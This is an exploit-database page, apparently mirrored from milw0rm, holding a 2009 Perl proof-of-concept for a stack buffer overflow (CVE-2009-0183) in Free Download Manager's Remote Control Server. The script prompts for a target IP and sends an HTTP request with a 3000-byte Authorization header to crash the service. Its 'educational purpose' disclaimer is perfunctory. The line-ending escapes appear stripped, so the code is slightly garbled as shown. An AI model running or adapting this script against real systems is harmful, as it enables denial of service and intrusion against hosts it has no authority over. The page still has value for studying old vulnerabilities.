[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Free Download Manager 2.5/3.0 (Authorization) Stack BOF PoC
# Published : 2009-02-04
# Author : Praveen Darshanam
# Previous Title : Novell GroupWise <= 8.0 Malformed RCPT command Off-by-one Exploit
# Next Title : UltraVNC/TightVNC Multiple VNC Clients Multiple Integer Overflow PoC
#!usr/bin/perl -w
#######################################################################################
# Stack-based buffer overflow in Remote Control Server in Free Download Manager
# (FDM) 2.5 Build 758 and 3.0 Build 844 allows remote attackers to execute
# arbitrary code via a long Authorization header in an HTTP request.
# Refer:
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0183
#
# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with
# "#!Installation_path_for_perl -w" (say #!C:/Program Files/Perl/bin/perl -w)
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
# Author: Praveen Darshanam
# Email: praveen[underscore]recker[at]sify.com
# Blog: http://www.darshanams.blogspot.com/
# Date: 04th February, 2009
#
########Thanx to str0ke,milw0rm, @rp m@n, and all the security folks####################
########################################################################################
use IO::Socket;
print("nEnter IP Address of Remote Control Server(not domain) FDM: n");
$vuln_host_ip = <STDIN>;
$sock_http = IO::Socket::INET->new( PeerAddr => $vuln_host_ip,
PeerPort => 80,
Proto => 'tcp') || "Unable to create Socket for HTTP Connection";
$mal_buff="D"x3000;
$http_attack = "GET / HTTP/1.1rn".
"Host: $vuln_host_iprn".
"Authorization:$mal_buffrn".
"Keep-Alive: 300rn".
"Connection: keep-alivernrn";
print $sock_http $http_attack;
close($sock_http);
# www.Syue.com [2009-02-04]